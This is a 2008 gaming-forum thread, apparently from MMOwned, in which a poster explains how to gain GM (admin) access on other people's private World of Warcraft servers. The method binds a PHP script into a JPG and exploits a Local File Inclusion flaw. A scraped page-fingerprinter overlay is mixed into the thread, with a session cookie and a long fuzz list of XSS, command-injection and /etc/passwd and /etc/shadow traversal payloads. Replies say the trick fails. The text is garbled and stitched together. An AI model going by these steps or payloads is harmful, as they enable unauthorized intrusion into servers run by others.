[Tutorial] Getting GM on MOST Private Servers

**Wolfe** · 09-07-2008

Alright hello everyone and welcome to my little tutorial!
You may be like omg noob he hes epic failed once here he goes again.

You can just press Alt+F4 now!

Today what we're going to be doing is finding a Local File Inclusion (LFI) flaw in a website. This once worked for toxic-wow, but no longer does. Don't ask me why, but it doesn't!

So we're going to start off by binding a new image file with our new .txt file that has been coded to exploit the server.

Now before we have a new image, we need to custimize this php script written and made by me.

Free File Hosting Made Simple - MediaFire

LFI.txt

Now edit the VALUEs so the first `login` REMAINS `login` BUT "login" goes whatever your login name is emaple i'd put "wolfe"

Now where ever you file is uploaded you need to put as many ../ as there is /
Example if theres a link.
http://examplesite.com/avatars/upload/coolimage.jpg
You would need 2 ../ so the config would look like

include("../../stats/config.php");

OK now that you have that file configured for you we need to combine it with an image any image this is my favorite.

If you want to use this do a Right Click save as Test.jpg

Next we're going to use command prompt to binary bind two files together!

If you don't know how to get to command prompt this tutorial is too hard for you and should just leave now.

Next open up where you have your files saved at they should both be saved in the same folder just for easy access.

Mine is C:\LFI
So the command we want is

Code:

cd C:LFI/

After that press enter!

So now it should say

C:\LFI>(You can enter text here, omg so cool, eh !!!!)

The next command we want to do is.

Code:

copy /B imagehere.jpg + phpcodehere.txt NewFileNamehere.jpg

The image MUST be first otherwise it won't work!

Now it doesn't matter if you do .txt or .php but I find txt to work better and more comptable with more images.

So now you should see a new file the one we just created NewFileNameHere.jpg

TEST IT! Open it with notepad and see if if you can find our PHP script!

Now go upload it to a site and run it, if it works you can now log in with the details you config'd up above. If it didn't well you can't!

So thats pretty much it, if you guys aren't sure how to set up your config or something feel free to post here and ill answer.

If I get POSTIVE comments on this I might show you guys how to retrive the SQL admin username and password for a Private Server, pretty much COMPLETE control!

Also Free File Hosting Made Simple - MediaFire is where all the files that I used is stored in, include the final result! Enjoy!

~Wolfe<div style="border: 1px outset gray; padding: 1%; display: none; opacity: 0; position: absolute; left: 10%; right: 10%; top: 1%; text-align: left; background-color: black; color: white; float: right;" id="yehgfingerprint">YEHG.Net Greasemonkey Web Page Fingerprinter
[COLOR=yellow ! important][x][/COLOR]

[URL]

http://www.mmowned.com/forums/emulator-server-exploits-bugs/164811-tutorial-getting-gm-most-private-servers.html

[Headers]

Server: LiteSpeed
X-Powered-By: PHP/5.2.6
Date: Wed, 10 Sep 2008 22:42:50 GMT Connection: Keep-Alive Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Content-length: 149109
Cookie: IDstack=%2C57342%2C%2C349757%2C; __utma=67421069.334934750.1231293359.1231536738.1231540886.13; __utmz=67421069.1231295481.1.2.utmccn=(organic)|utmcsr=google|utmctr=ascent+maki ng+a+admin+account+via+sql|utmcmd=organic; __qca=48aba167-91b44-a128e-21969; bblastvisit=1220993554; bblastactivity=0; PHPSESSID=bd1cf1607d33e6b2a440586c4a00cdca; __qcb=931531576; __utmc=67421069; __utmb=67421069
=> [COLOR=yellow ! important]Edit Cookie[/COLOR]

[RECON]

---Lookup---WebhostinfoDNSStuffRobtexDNSNetwork DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX RecordsdirIndexingcache:link:site:emailfile

dffile:xlsfile:xmlfile:docfile

ptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlf ile

sfile:exefile:rpmfile:dbfile:mdbfile:logfile

asswdfile

wd [[COLOR=yellow ! important]Launch all[/COLOR]] [[COLOR=yellow ! important]Prepend Proxy[/COLOR]]

[BruteForce Scan]

-- Select ---Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_p asswords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiC gisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9 iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp [[COLOR=yellow ! important]Start[/COLOR]] [[COLOR=yellow ! important]View[/COLOR]]

Loading ...

Do other stuffs.
Seem slowly? As it doesn't do multi-requests,
it's likely that web server IDS may not detect scanning.
But it's for dictionary scanning only.

[Stat]

Total Form: 0
Total Link: 3

[Fuzz URL]

http://www.mmowned.com/forums/emulat...servers.html?=

Select Fuzz Type: Fuzz [default]BackupFilesHeaderCheckCSRFCS Framing [[COLOR=yellow ! important]Help[/COLOR]]

Fuzz Options Fuzz Db: -- Check --1) ---!><!--">xxx<P>yyy..2) "><script>"..3) <script>..</script&gt..4) <<script>..;//<&lt..5) <script>..</script&gt..6) '><script>..<..7) "><script>..;</script&gt..

\";..;//..9) %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) %3Cscript%3E..;%3C/script%3E..12) &ltscript&gt..;</sc..13) &ltscript&gt..;&lt..14) <xss><script>alert('XSS')&lt..15) <IMG%20SRC='javascript:..16) <IMG SRC="javascript:alert('XSS'..17) <IMG SRC="javascript:alert('XSS'..1

<IMG SRC=javascript:alert('XSS')>..19) <IMG SRC=JaVaScRiPt:alert('XSS')>..20) <IMG SRC=javascript:alert("XSS&quo..21) <IMG SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc ript:..25) <IMG SRC="jav ascript:alert('XSS'..26) <IMG SRC="jav	ascript:alert('..27) <IMG SRC="jav
ascript:alert('..2

<IMG SRC="javascript:alert('..29) <IMG SRC=" javascript:alert(..30) <IMG DYNSRC="javascript:alert('XSS..31) <IMG LOWSRC="javascript:alert('XSS..32) <IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG SRC=java..34) <IMG SRC=&#0000106&#0000097&#000011..35) <IMG SRC=&#x6A&#x61&#x76&#x61&a..36) '%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37) %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..3

';alert(String.fromCharCode(88,83,83))//\..39) '';!--"<XSS>=&{()}..40) A..41) TRUE..42) FALSE..43) 0..44) 00..45) 1..46) -1..47) 1.0..4

-1.0..49) 2..50) -2..51) -20..52) 65536..53) 268435455..54) -268435455..55) 2147483647..56) 0xfffffff..57) NULL..5

null..59) \0..60) \00..61) < script > < / script>..62) %0a..63) %00..64) +%00..65) \0..66) \0\0..67) \0\0\0..6

\00..69) \00\00..70) \00\00\00..71) $null..72) $NULL..73) `id`..74) `dir`..75) ;id;..76) ;read;..77) ;netstat -a;..7

\nnetstat -a%\n..79) \"blah..80) |id|..81) ";id"..82) id%00..83) id%00|..84) |id..85) |dir..86) |dir|..87) |ls..8

/boot.ini..99) /etc/passwd..100) /etc/shadow..101) ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102) ../../../../../../../../../../../../etc/hosts%00..103) ../../../../../../../../../../../../etc/hosts..104) ../../boot.ini..105) /../../../../../../../../%2A..106) ../../../../../../../../../../../../etc/passwd%00..107) ../../../../../../../../../../../../etc/passwd..10

../../../../../../../../../../../../etc/shadow%00..109) ../../../../../../../../../../../../etc/shadow..110) /../../../../../../../../../../etc/passwd^^..111) /../../../../../../../../../../etc/shadow^^..112) /../../../../../../../../../../etc/passwd..113) /../../../../../../../../../../etc/shadow..114) /./././././././././././etc/passwd..115) /./././././././././././etc/shadow..116) \..\..\..\..\..\..\..\..\..\..\etc\pas..117) \..\..\..\..\..\..\..\..\..\..\etc\sha..11

..\..\..\..\..\..\..\..\..\..\etc\passw..119) ..\..\..\..\..\..\..\..\..\..\etc\shado..120) /..\../..\../..\../..\../..\../..\../etc/pas..121) /..\../..\../..\../..\../..\../..\../etc/sha..122) .\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123) .\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124) \..\..\..\..\..\..\..\..\..\..\etc\pas..125) \..\..\..\..\..\..\..\..\..\..\etc\sha..126) ..\..\..\..\..\..\..\..\..\..\etc\passw..127) ..\..\..\..\..\..\..\..\..\..\etc\shado..12

%0a/bin/cat%20/etc/passwd..129) %0a/bin/cat%20/etc/shadow..130) %00/etc/passwd%00..131) %00/etc/shadow%00..132) %00../../../../../../etc/passwd..133) %00../../../../../../etc/shadow..134) /../../../../../../../../../../../etc/passwd%00.jp..135) /../../../../../../../../../../../etc/passwd%00.ht..136) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137) /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..13

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143) %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144) /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145) \\'/bin/cat%20/etc/passwd\\'..146) \\'/bin/cat%20/etc/shadow\\'..147) ../../../../../../../../conf/server.xml..14

/../../../../../../../../bin/id|..149) C:/inetpub/wwwroot/global.asa..150) C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) C:\boot.ini..153) ../../../../../../../../../../../../localstart.asp..154) ../../../../../../../../../../../../localstart.asp..155) ../../../../../../../../../../../../boot.ini%00..156) ../../../../../../../../../../../../boot.ini..157) /./././././././././././boot.ini..15

/../../../../../../../../../../../boot.ini%00..159) /../../../../../../../../../../../boot.ini..160) /..\../..\../..\../..\../..\../..\../boot.in..161) /.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162) \..\..\..\..\..\..\..\..\..\..\boot.ini..163) ..\..\..\..\..\..\..\..\..\..\boot.ini%0..164) ..\..\..\..\..\..\..\..\..\..\boot.ini..165) /../../../../../../../../../../../boot.ini%00.html..166) /../../../../../../../../../../../boot.ini%00.jpg..167) /.../.../.../.../.../..16

..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169) /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..170) %0d%0aX-Injection-Header:%20AttackValue..171) !@#0%^#0##018387@#0^^**(()..172) %01%02%03%04%0a%0d%0aADSF..173) /,%ENV,/..174) <!--#exec%20cmd="/bin/cat%20/etc/p..175) <!--#exec%20cmd="/bin/cat%20/etc/s..176) %..177) #..17

*..179) }..180) ;..181) /..

**Troys** · 09-07-2008

nice =]] <fillar>

**110133130** · 09-07-2008

I tried the instructions above... No popup appeared on my screen though...

I was able to access a similar screen, though i violated one of your instructions... I clicked submit, and a popup appeared, and i clicked "tamper". Then i used the 'az' command where you instructed. I logged onto the server and was not able to use any GM commands...

**Patchumz** · 09-07-2008

This sounds a bit odd, mainly cuz I didn't know you could set privileges on account creation.. but other than that I'll test it out in the morning on as many servers as I can (Assuming it doesn't work on the first one).

**Mirror** · 09-07-2008

Very interesting. Anybody wanna try on WoWScape? Lol

**Patchumz** · 09-07-2008

So far none of the servers I play on can do this. I'm going to keep trying more servers though.

**QQmore** · 09-07-2008

Originally Posted by 110133130

I tried the instructions above... No popup appeared on my screen though...

I was able to access a similar screen, though i violated one of your instructions... I clicked submit, and a popup appeared, and i clicked "tamper". Then i used the 'az' command where you instructed. I logged onto the server and was not able to use any GM commands...

Same thing for me.

**Patchumz** · 09-08-2008

Doing 'az' doesn't work even on the server you put on the tutorial... maybe '3' would work, dunno.. but 'az' doesn't make anyone a GM apparently.

EDIT: Absolutely nothing works on the server he listed, trying to get rep for free is my guess, otherwise the tutorial's example would've worked.

**treeko11** · 09-08-2008

This is pretty fail.

I have just spent the last 30 minutes trying this out and it simply has only worked on the tutorial server, its prolly his server and he changed it to do that...

loser

**Troys** · 09-08-2008

ehh doesnt work on all the servers iv tried

**Wolfe** · 09-08-2008

Alright, since you guys can't manage this. Ill show you how to get GM on ToxicWoW.

**Volgata** · 09-08-2008

done it once.... cant get it to work again. I must be messin up now.

**Volgata** · 09-08-2008

possible to PM me with info wolfe?

**Wolfe** · 09-08-2008

At school atm, study hall almost over ill be home soon ^^ but toxic wow have no idea how to make a secure login along with wowscape ^^

**Patchumz** · 09-08-2008

It didn't even work on the server you used for the tut (for me) so I dunno how you're going to 'show us how'..

Shout-Out

User Tag List

Thread: [Tutorial] Getting GM on MOST Private Servers

Thread Tools

Search Thread

[TUTORIAL] Wolfe's Complete Tutorial on Website Hacking for GM

hmmm

Similar Threads

How do i get Battlegrounds in my private server or, what is a good repack with BG's

[Guide/Tutorial] How to make a private server 2.3+ [PICTURES]

[REPOST]How to get out of a private server IP ban?

Can someone help me get onto a WoW private server?

OwnedCore Forums

casino

CoreCoins

My OwnedCore

About Us

Casino